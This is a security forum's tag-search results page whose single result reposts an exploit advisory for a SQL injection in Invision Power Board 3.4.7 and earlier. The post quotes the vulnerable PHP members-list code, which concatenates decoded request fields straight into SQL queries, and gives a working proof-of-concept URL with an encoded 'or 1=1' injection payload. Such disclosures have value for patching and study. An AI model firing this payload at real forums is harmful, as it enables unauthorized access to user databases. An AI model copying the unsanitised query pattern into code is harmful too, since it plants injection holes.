Jump to content

Search the Community

Showing results for tags '$this-request['.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 1 result

  1. # Exploit Title: Invision Power Board <= 3.4.7 SQL Injection # Date: 29.05.2015 # Exploit Author: ZeroDay # Software Link: http://www.invisionpower.com/ # Version: <= 3.4.7 # Tested on: 3.4.7 # About: For the G-Owl with Love vuln code admin/applications/members/modules_public/list/view.php //----------------------------------------- // Custom fields? //----------------------------------------- if ( count( $this->custom_fields->out_fields ) ) { foreach( $this->custom_fields->out_fields as $id => $data ) { if ( !empty($this->request[ 'field_' . $id ]) ) { $_queryPP = true; if( is_array($this->request[ 'field_' . $id ]) ) { foreach( $this->request[ 'field_' . $id ] as $k => $v ) { $this->request[ 'field_' . $id ][ $k ] = urldecode($v); $url['field_' . $id] = "field_{$id}[{$k}]=" . $v; } } else { $url['field_' . $id] = "field_{$id}=" . $this->request[ 'field_' . $id ]; $this->request[ 'field_' . $id ] = urldecode($this->request[ 'field_' . $id ]); } if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'drop' ) { $query[] = "p.field_{$id}='" . $this->request[ 'field_' . $id ] . "'"; } else if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'cbox' ) { if ( count( $this->request[ 'field_' . $id ] ) ) { if ( $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ) { $cboxFields = array(); foreach ( $this->request[ 'field_' . $id ] as $k => $v ) { $cboxFields[] = "p.field_{$id} LIKE '%|{$k}|%'"; } $query[] = "( " . implode( ' OR ', $cboxFields ) . " )"; } else { foreach ( $this->request[ 'field_' . $id ] as $k => $v ) { $query[] = "p.field_{$id} LIKE '%|{$k}|%'"; } } } } else { $query[] = $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ? "p.field_{$id} LIKE '%" . $this->request[ 'field_' . $id ] . "%'" : "p.field_{$id} = '" . $this->request[ 'field_' . $id ] . "'"; } } } } ...... POC index.php?/members/?field_1=admin%2525%2527%2Bor%2B1%253D1--%2B1 Source
×
×
  • Create New...